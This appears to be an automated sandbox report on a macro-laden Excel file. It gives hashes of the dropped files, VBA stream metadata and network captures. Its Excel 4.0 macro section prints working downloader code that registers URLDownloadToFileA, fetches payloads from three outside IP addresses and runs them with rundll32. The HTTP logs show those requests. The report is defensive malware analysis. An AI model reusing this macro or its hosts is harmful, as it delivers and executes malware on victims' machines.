              SHA-256:C31F711B323EA0B1D04C7A72ECAC0BBBF4DC4ECC56F837FEFE754F53385D07B1
              SHA-512:1E70FD6101A50A0AEDFF22C2DB22A5FB4E063C02E6C062097A973FED663E6623BDA2FFA33B266001AB99BA5AA945FA51C1571C553015C8F8633D68BFA7F663D1
              Malicious:false
              Reputation:moderate, very likely benign file
              Preview: GIF89a@.@.p..!.......,....@.@.......3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f.........3..3.33.f3..3..3..3+.3+33+f3+.3+.3+.3U.3U33Uf3U.3U.3U.3..3.33.f3..3..3..3..3.33.f3..3..3..3..3.33.f3.3..3..3..3.33.f3..3..3..f..f.3f.ff..f..f..f+.f+3f+ff+.f+.f+.fU.fU3fUffU.fU.fU.f..f.3f.ff..f..f..f..f.3f.ff..f..f..f..f.3f.ff.f..f..f..f.3f.ff..f..f.......3..f.........+..+3.+f.+..+.+..U..U3.Uf.U..U.U......3..f.............3..f.............3..f............3..f.............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U....3.f.........3.f...........3..f.............3..f..............3..f..........+..+3.+f.+..+..+..U..U3.Uf.U..U..U......3..f..............3..f..............3..f.............3..f........................y..Hp.....*L.p....J.Hq.../j..q.. ?..Ir..(O.L.r..0_.Is...=...y.M..@y.....O.>......D...z.h.L.<e...6..tm....9.......Y.d..]....h...V._.^...kv-.e...6...i.>N..1....C....d.n.}..,..bM_.<:.h.
              C:\Users\user\AppData\Local\Temp\98DE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):180499
              Entropy (8bit):7.963755763028083
              Encrypted:false
              SSDEEP:3072:3FqoCdXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGN:3QoChE5SDvbXAyHbVt15wTQDU
              MD5:B7134FBE9AAA0BEC47C04A89CE32402B
              SHA1:932282128C342414F776B356D73473B242F42153
              SHA-256:D7147D9FACC4C33EF81993180FB0EC3CD4180ABD9BD5F724DFCDFBCBD12E6ED1
              SHA-512:46F5E18F66F8EEDA6F863803B3A1295EB842E55F2D2A33D09A8C6C18A50C564BC12FAC1C38500B32772103B2E4C80C44F32D16048B29AB20A59A611C7CDC2463
              Malicious:false
              Reputation:low
              Preview: .U.n.0....?..."..(..r.izl.$...\I....8..wI;vk....E/jgv....fet.........R..N*.5....+.b.Vr.,4d....>~.>.=...mlH....X.=....`q.u.....c....]O&_.p6.Mu..d6..-...[..M'seIu../S5.{.....eK+.Hj.J.t.. 4.>....HFS..2..H..E.r..q..V....X..P....rZ..N..u.d7.w...70(..=..'7..[i...b.....f.X.J...1j......\..j:.T*#+...(.=$../+).#...O}......}.....[./...4./.u<M...V.o??.f.......Z......s......{..c..!...-....}.......>.'....=..M..}....G`.q......y..k.@...]..K..#...S.... .p.2pg........PK..........!.x...............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\91476525608-04012021.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:17 2020, mtime=Fri Apr 2 03:31:40 2021, atime=Fri Apr 2 03:31:40 2021, length=180507, window=hide
              Category:dropped
              Size (bytes):2138
              Entropy (8bit):4.515531036164066
              Encrypted:false
              SSDEEP:24:8F/XTm6GreVWUhe8RDv3qldM7dD2F/XTm6GreVWUhe8RDv3qldM7dV:8F/XTFGqkUh4lQh2F/XTFGqkUh4lQ/
              MD5:854699E5720A5035C5D29B93D8498130
              SHA1:02BA57B6504162C7FD82430B52B38053E69AD598
              SHA-256:6F5CC3795442B941B758ED55D0F8DF55EC9F7928D13C89A9FDEE3BD573C5D6B5
              SHA-512:F6B7321A3B2C3E57696D73DEE4E9AF7272C120C1F701DED4C55E238B8BC1C4239F67EDB94E747629B0F7851BD9D2010F2FBFA2BFDCBE3E8BC7D277BE22F2F53F
              Malicious:false
              Reputation:low
              Preview: L..................F.... ........{......y'..#...y'...............................P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......Q.y..Desktop.d......QK.X.Q.y*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.....|.2.M....R.# .914765~1.XLS..`.......Q.y.Q.y*...8.....................9.1.4.7.6.5.2.5.6.0.8.-.0.4.0.1.2.0.2.1...x.l.s.m.......................-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop\91476525608-04012021.xlsm.0.....\.....\.....\.....\.....\.D.e.s.k.t.o.p.\.9.1.4.7.6.5.2.5.6.0.8.-.0.4.0.1.2.0.2.1...x.l.s.m.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400.........
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Desktop.LNK
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Read-Only, Directory, ctime=Tue Oct 17 10:04:00 2017, mtime=Fri Apr 2 03:31:40 2021, atime=Fri Apr 2 03:31:40 2021, length=8192, window=hide
              Category:dropped
              Size (bytes):867
              Entropy (8bit):4.498969300062093
              Encrypted:false
              SSDEEP:12:85QMyLgXg/XAlCPCHaX2B8GB/4lX+WnicvbSR9bDtZ3YilMMEpxRljKt2TdJP9TK:85Y/XTm6GYYe6Dv3qlrNru/
              MD5:A88EC9B06635BDFAD6B1230C022126C7
              SHA1:D9C18BCBD3CAA4DDBEA4A1FAE638949CDFC13A39
              SHA-256:DC87C300B6271F0CEF1C0685B24D078200337B7C2030AB55A611706DD51B5814
              SHA-512:6AD187771C486D7E95B9768E8255306AFC7D9DF0E367D50B122C53EF47E74AEE4B1678CEE7AC2FF576ED1885B4600E8430844430526AF97F4C51E6F79565E6DA
              Malicious:false
              Reputation:low
              Preview: L..................F...........7G..#...y'..#...y'... ......................i....P.O. .:i.....+00.../C:\...................t.1.....QK.X..Users.`.......:..QK.X*...................6.....U.s.e.r.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.8.1.3.....L.1......Q.y..user.8......QK.X.Q.y*...&=....U...............A.l.b.u.s.....z.1......R.#..Desktop.d......QK.X.R.#*..._=..............:.....D.e.s.k.t.o.p...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.6.9.......i...............-...8...[............?J......C:\Users\..#...................\\287400\Users.user\Desktop.......\.....\.....\.....\.....\.D.e.s.k.t.o.p.........:..,.LB.)...Ag...............1SPS.XF.L8C....&.m.m............-...S.-.1.-.5.-.2.1.-.9.6.6.7.7.1.3.1.5.-.3.0.1.9.4.0.5.6.3.7.-.3.6.7.3.3.6.4.7.7.-.1.0.0.6.............`.......X.......287400..........D_....3N...W...9r.[.*.......}EkD_....3N...W...9r.[.*.......}Ek....
              C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:ASCII text, with CRLF line terminators
              Category:dropped
              Size (bytes):115
              Entropy (8bit):4.476951246088606
              Encrypted:false
              SSDEEP:3:oyBVomxW4AECl+TEClmxW4AEClv:djUECQTEC9EC1
              MD5:9A8B152F14E864A0442647375EAEF800
              SHA1:F75AE3EA100D77463B10071D490354CE3FAFF74F
              SHA-256:73CA17369F3CDE5E4DA9BACAF17ABF3264FB8EF524E83EE66E236640EF078B72
              SHA-512:4234F266B163E10DE754A42353D1DF1F91BFB348A76BA9C8DEA9EDF242C9D797DDABB3E7E00742C672BD6C4DBC127523D0750C42F54F390A0A6D97054BEE91A2
              Malicious:false
              Reputation:low
              Preview: Desktop.LNK=0..[misc]..91476525608-04012021.LNK=0..91476525608-04012021.LNK=0..[misc]..91476525608-04012021.LNK=0..
              C:\Users\user\Desktop\59DE0000
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):180507
              Entropy (8bit):7.963878387347031
              Encrypted:false
              SSDEEP:3072:3FqqOdXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGP:3QqOhE5SDvbXAyHbVt15wTQDK
              MD5:A4810B96CF792356F7222D353E442C37
              SHA1:6DDEA43AC807F019BF5F670315CBE694E26A3477
              SHA-256:4D282DDCEBDB05E5DB27DD4BD8E89DE6323974AA8D7DCFA8B6E46C3ECCA77BCE
              SHA-512:B4899203CC1F2085DE62885E6A5A0956D239FCA546713C6CEB514957562BF1E86240ADBF6E8BAB44D20F9C2DC90E6D994C7E54B83DDC82FBB725B144F35A8F74
              Malicious:false
              Reputation:low
              Preview: .U.n.0....?..."..(..r.izl.$...\I....8..wI;vk....E/jgv....fet.........R..N*.5....+.b.Vr.,4d....>~.>.=...mlH....X.=....`q.u.....c....]O&_.p6.Mu..d6..-...[..M'seIu../S5.{.....eK+.Hj.J.t.. 4.>....HFS..2..H..E.r..q..V....X..P....rZ..N..u.d7.w...70(..=..'7..[i...b.....f.X.J...1j......\..j:.T*#+...(.=$../+).#...O}......}.....[./...4./.u<M...V.o??.f.......Z......s......{..c..!...-....}.......>.'....=..M..}....G`.q......y..k.@...]..K..#...S.... .p.2pg........PK..........!.x...............[Content_Types].xml ...(..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
              C:\Users\user\Desktop\~$91476525608-04012021.xlsm
              Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              File Type:data
              Category:dropped
              Size (bytes):330
              Entropy (8bit):1.4377382811115937
              Encrypted:false
              SSDEEP:3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
              MD5:96114D75E30EBD26B572C1FC83D1D02E
              SHA1:A44EEBDA5EB09862AC46346227F06F8CFAF19407
              SHA-256:0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
              SHA-512:52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
              Malicious:true
              Reputation:high, very likely benign file
              Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

              Static File Info

              General

              File type:Microsoft Excel 2007+
              Entropy (8bit):7.962528117929017
              TrID:
              • Excel Microsoft Office Open XML Format document with Macro (57504/1) 54.50%
              • Excel Microsoft Office Open XML Format document (40004/1) 37.92%
              • ZIP compressed archive (8000/1) 7.58%
              File name:91476525608-04012021.xlsm
              File size:176993
              MD5:e8d0244666daf465e9914a7f56938412
              SHA1:3c5f71752b0cea18b06dfad9a96cdfeb053f45cc
              SHA256:196668480754f95f98c6e59d4776e4f8c756ad3be9fd48a27cfcb50be329567e
              SHA512:d9d9cdfc5eed50798eb3ee4e60b9c5d6a8d7d52dbcce00e17b37681d3f43cd4ee5698b6b2bd1b3978ad24a402ca002b49ed6ef409e30ac8c94d7a503254da476
              SSDEEP:3072:DXE59b4DETZU4yvUCidynhV912A7bF8mrcLwKw55eiETTcDGDKJj:LE5SDvbXAyHbVt15wTQD0KJj
              File Content Preview:PK..........!..D.C............[Content_Types].xml ...(.........................................................................................................................................................................................................

              File Icon

              Icon Hash:e4e2aa8aa4bcbcac

              Static OLE Info

              General

              Document Type:OpenXML
              Number of OLE Files:1

              OLE File "/opt/package/joesandbox/database/analysis/380316/sample/91476525608-04012021.xlsm"

              Indicators

              Has Summary Info:False
              Application Name:unknown
              Encrypted Document:False
              Contains Word Document Stream:
              Contains Workbook/Book Stream:
              Contains PowerPoint Document Stream:
              Contains Visio Document Stream:
              Contains ObjectPool Stream:
              Flash Objects Count:
              Contains VBA Macros:True

              Summary

              Author:Rabota
              Last Saved By:Feriola
              Create Time:2015-06-05T18:19:34Z
              Last Saved Time:2021-04-01T11:57:52Z
              Creating Application:Microsoft Excel
              Security:0

              Document Summary

              Thumbnail Scaling Desired:false
              Company:
              Contains Dirty Links:false
              Shared Document:false
              Changed Hyperlinks:false
              Application Version:16.0300

              Streams with VBA

              VBA File Name: Module1.bas, Stream Size: 948
              General
              Stream Path:VBA/Module1
              VBA File Name:Module1.bas
              Stream Size:948
              Data ASCII:. . . . . . . . . z . . . . . . . . . . . . . . . . . . . 1 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 00 f0 00 00 00 7a 02 00 00 d4 00 00 00 88 01 00 00 ff ff ff ff 81 02 00 00 31 03 00 00 00 00 00 00 01 00 00 00 d2 b3 f0 e3 00 00 ff ff 03 00 00 00 00 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

              VBA Code Keywords

              Keyword
              Application.Run
              Attribute
              Auto_Open()
              VB_Name
              Private
              VBA Code

              Streams

              Stream Path: PROJECT, File Type: ISO-8859 text, with CRLF line terminators, Stream Size: 527
              General
              Stream Path:PROJECT
              File Type:ISO-8859 text, with CRLF line terminators
              Stream Size:527
              Entropy:5.31297412231
              Base64 Encoded:True
              Data ASCII:I D = " { 0 0 0 0 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 - 0 0 0 0 0 0 0 0 0 0 0 0 } " . . D o c u m e n t = . . . . . . . . / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = . . . . 1 / & H 0 0 0 0 0 0 0 0 . . M o d u l e = M o d u l e 1 . . H e l p F i l e = " " . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " E 8 E A 4 4 9 2 4 8 9 2 4 8 9 7 4 D 9 7 4 D " . . D P B = " 3 5 3 7 9 9 A E A B E 6 C 8 E 6 C 8 1
              Data Raw:49 44 3d 22 7b 30 30 30 30 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 2d 30 30 30 30 30 30 30 30 30 30 30 30 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d dd f2 e0 ca ed e8 e3 e0 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d cb e8 f1 f2 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 4d 6f 64 75 6c 65 3d 4d 6f 64 75 6c 65 31 0d 0a 48 65 6c 70 46 69 6c 65 3d 22
              Stream Path: PROJECTwm, File Type: data, Stream Size: 71
              General
              Stream Path:PROJECTwm
              File Type:data
              Stream Size:71
              Entropy:3.95636440452
              Base64 Encoded:False
              Data ASCII:. . . . . . . . . - . B . 0 . . . = . 8 . 3 . 0 . . . . . . . 1 . . . 8 . A . B . 1 . . . M o d u l e 1 . M . o . d . u . l . e . 1 . . . . .
              Data Raw:dd f2 e0 ca ed e8 e3 e0 00 2d 04 42 04 30 04 1a 04 3d 04 38 04 33 04 30 04 00 00 cb e8 f1 f2 31 00 1b 04 38 04 41 04 42 04 31 00 00 00 4d 6f 64 75 6c 65 31 00 4d 00 6f 00 64 00 75 00 6c 00 65 00 31 00 00 00 00 00
              Stream Path: VBA/_VBA_PROJECT, File Type: data, Stream Size: 2555
              General
              Stream Path:VBA/_VBA_PROJECT
              File Type:data
              Stream Size:2555
              Entropy:4.01853324276
              Base64 Encoded:False
              Data ASCII:. a . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . * . \\ . G . { . 0 . 0 . 0 . 2 . 0 . 4 . E . F . - . 0 . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . - . C . 0 . 0 . 0 . - . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 0 . 4 . 6 . } . # . 4 . . . 2 . # . 9 . # . C . : . \\ . P . r . o . g . r . a . m . . F . i . l . e . s . \\ . C . o . m . m . o . n . . F . i . l . e . s . \\ . M . i . c . r . o . s . o . f . t . . S . h . a . r . e . d . \\ . V . B . A . \\ . V . B . A . 7 . . . 1 . \\ . V . B . E . 7 .
              Data Raw:cc 61 b2 00 00 03 00 ff 19 04 00 00 09 04 00 00 e3 04 03 00 00 00 00 00 00 00 00 00 01 00 04 00 02 00 20 01 2a 00 5c 00 47 00 7b 00 30 00 30 00 30 00 32 00 30 00 34 00 45 00 46 00 2d 00 30 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 2d 00 43 00 30 00 30 00 30 00 2d 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 30 00 34 00 36 00 7d 00 23 00 34 00 2e 00 32 00 23 00
              Stream Path: VBA/dir, File Type: data, Stream Size: 549
              General
              Stream Path:VBA/dir
              File Type:data
              Stream Size:549
              Entropy:6.37926381995
              Base64 Encoded:True
              Data ASCII:. ! . . . . . . . . . . 0 * . . . . . p . . H . . . . . d . . . . . . . . V B A P r o j e . c t . . 4 . . @ . . j . . . = . . . . r . . . . . . . . . = . V b . . . . . J < . . . . . r . s t d o l e > . . . s . t . d . o . . l . e . . . h . % . ^ . . * \\ G { 0 0 . 0 2 0 4 3 0 - . . . . . C . . . . . . 0 0 4 . 6 } # 2 . 0 # 0 . # C : \\ W i n d . o w s \\ S y s t e m 3 2 \\ . e 2 . . t l b # O L E . A u t o m a t i . o n . ` . . . E O f f D i c . E O . f . . i . . c . E . . . . . . . E . 2 D F 8 D 0 4 C . -
              Data Raw:01 21 b2 80 01 00 04 00 00 00 03 00 30 2a 02 02 90 09 00 70 14 06 48 03 00 82 02 00 64 e3 04 04 00 0a 00 1c 00 56 42 41 50 72 6f 6a 65 88 63 74 05 00 34 00 00 40 02 14 6a 06 02 0a 3d 02 0a 07 02 72 01 14 08 05 06 12 09 02 12 3d c5 56 62 01 94 00 0c 02 4a 3c 02 0a 16 00 01 72 80 73 74 64 6f 6c 65 3e 02 19 00 73 00 74 00 64 00 6f 00 80 6c 00 65 00 0d 00 68 00 25 02 5e 00 03 2a 5c 47
              Stream Path: VBA/\x1051\x1080\x1089\x10901, File Type: data, Stream Size: 990
              General
              Stream Path:VBA/\x1051\x1080\x1089\x10901
              File Type:data
              Stream Size:990
              Entropy:3.21290365488
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . - . . . . . . . . . . . . . n } . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 2d 03 00 00 00 00 00 00 01 00 00 00 d2 b3 6e 7d 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
              Stream Path: VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072, File Type: data, Stream Size: 1009
              General
              Stream Path:VBA/\x1069\x1090\x1072\x1050\x1085\x1080\x1075\x1072
              File Type:data
              Stream Size:1009
              Entropy:3.24479314936
              Base64 Encoded:True
              Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9 . . . . . . . . . . . . . . . . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
              Data Raw:01 16 03 00 00 f0 00 00 00 d2 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff d9 02 00 00 39 03 00 00 00 00 00 00 01 00 00 00 d2 b3 f3 e4 00 00 ff ff 23 00 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

              Macro 4.0 Code

              =EXEC("rundll32 "&"..\Hodas.vyur1"&",PluginInit")
              =GOTO(Hi!D4)
              =NOW()
              =NOW()=NOW()=NOW()=FORMULA("URLDownloadToFileA",CE271)
              =CONCATENATE(CC274,CD266,CC273)
              =CONCATENATE(CC275,CD266,CC273)
              =NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE269,CE273,,1,9)
              JJCCJJ
              =CONCATENATE(CC276,CD266,CC273)
              =NOW()=NOW()=NOW()=REGISTER(CE270,CE271,CE272,CE273,,1,9)
              uRlMon
              =NOW()=NOW()=NOW()=Belandes(0,CC268,"..\Hodas.vyur",0,0)
              =NOW()=NOW()=NOW()=Belandes(0,CC269,"..\Hodas.vyur1",0,0)
              JJCCBB
              =".dat"
              =NOW()=NOW()=NOW()=Belandes(0,CC270,"..\Hodas.vyur2",0,0)
              Belandes
              ="http://45.150.67.243/"
              ="http://195.123.210.186/"
              ="http://91.211.89.28/"
              =NOW()=NOW()=NOW()=EXEC("rundll32 "&"..\Hodas.vyur"&",PluginInit")
              =GOTO(Jo!E4)
              =EXEC("rundll32 "&"..\Hodas.vyur2"&",PluginInit")
              =HALT()

              Network Behavior

              Snort IDS Alerts

              Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
              04/01/21-21:31:58.735209 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49167 | 45.150.67.243 | 192.168.2.22
              04/01/21-21:31:58.949118 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49168 | 195.123.210.186 | 192.168.2.22
              04/01/21-21:31:59.201012 | TCP | 1201 | ATTACK-RESPONSES 403 Forbidden | 80 | 49169 | 91.211.89.28 | 192.168.2.22

              Network Port Distribution

              TCP Packets

              Timestamp | Source Port | Dest Port | Source IP | Dest IP
              Apr 1, 2021 21:31:58.450840950 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243
              Apr 1, 2021 21:31:58.544945002 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22
              Apr 1, 2021 21:31:58.545104980 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243
              Apr 1, 2021 21:31:58.545795918 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243
              Apr 1, 2021 21:31:58.640867949 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22
              Apr 1, 2021 21:31:58.735208988 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22
              Apr 1, 2021 21:31:58.735383987 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243
              Apr 1, 2021 21:31:58.754887104 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186
              Apr 1, 2021 21:31:58.820130110 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22
              Apr 1, 2021 21:31:58.820208073 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186
              Apr 1, 2021 21:31:58.821412086 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186
              Apr 1, 2021 21:31:58.886327028 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22
              Apr 1, 2021 21:31:58.949117899 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22
              Apr 1, 2021 21:31:58.949312925 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186
              Apr 1, 2021 21:31:58.972136974 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28
              Apr 1, 2021 21:31:59.055402040 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22
              Apr 1, 2021 21:31:59.055572987 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28
              Apr 1, 2021 21:31:59.056567907 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28
              Apr 1, 2021 21:31:59.137582064 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22
              Apr 1, 2021 21:31:59.201011896 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22
              Apr 1, 2021 21:31:59.201190948 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28
              Apr 1, 2021 21:33:03.737008095 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22
              Apr 1, 2021 21:33:03.737082958 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243
              Apr 1, 2021 21:33:03.949423075 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22
              Apr 1, 2021 21:33:03.949605942 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186
              Apr 1, 2021 21:33:04.201545954 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22
              Apr 1, 2021 21:33:04.201699972 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28
              Apr 1, 2021 21:33:58.330796957 CEST | 49169 | 80 | 192.168.2.22 | 91.211.89.28
              Apr 1, 2021 21:33:58.331545115 CEST | 49168 | 80 | 192.168.2.22 | 195.123.210.186
              Apr 1, 2021 21:33:58.332189083 CEST | 49167 | 80 | 192.168.2.22 | 45.150.67.243
              Apr 1, 2021 21:33:58.399363041 CEST | 80 | 49168 | 195.123.210.186 | 192.168.2.22
              Apr 1, 2021 21:33:58.410571098 CEST | 80 | 49167 | 45.150.67.243 | 192.168.2.22
              Apr 1, 2021 21:33:58.415163994 CEST | 80 | 49169 | 91.211.89.28 | 192.168.2.22

              HTTP Request Dependency Graph

              • 45.150.67.243
              • 195.123.210.186
              • 91.211.89.28

              HTTP Packets

              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              0 | 192.168.2.22 | 49167 | 45.150.67.243 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Timestamp | kBytes transferred | Direction | Data
              Apr 1, 2021 21:31:58.545795918 CEST | 0 | OUT | GET /44285,5327891204.dat HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 45.150.67.243
              Connection: Keep-Alive
              Apr 1, 2021 21:31:58.735208988 CEST | 1 | IN | HTTP/1.1 403 Forbidden
              Server: nginx
              Date: Thu, 01 Apr 2021 19:31:58 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: keep-alive
              Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


              Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
              1 | 192.168.2.22 | 49168 | 195.123.210.186 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
              Timestamp | kBytes transferred | Direction | Data
              Apr 1, 2021 21:31:58.821412086 CEST | 1 | OUT | GET /44285,5327891204.dat HTTP/1.1
              Accept: */*
              UA-CPU: AMD64
              Accept-Encoding: gzip, deflate
              User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
              Host: 195.123.210.186
              Connection: Keep-Alive
              Apr 1, 2021 21:31:58.949117899 CEST | 2 | IN | HTTP/1.1 403 Forbidden
              Server: nginx
              Date: Thu, 01 Apr 2021 19:31:58 GMT
              Content-Type: text/html
              Content-Length: 548
              Connection: keep-alive
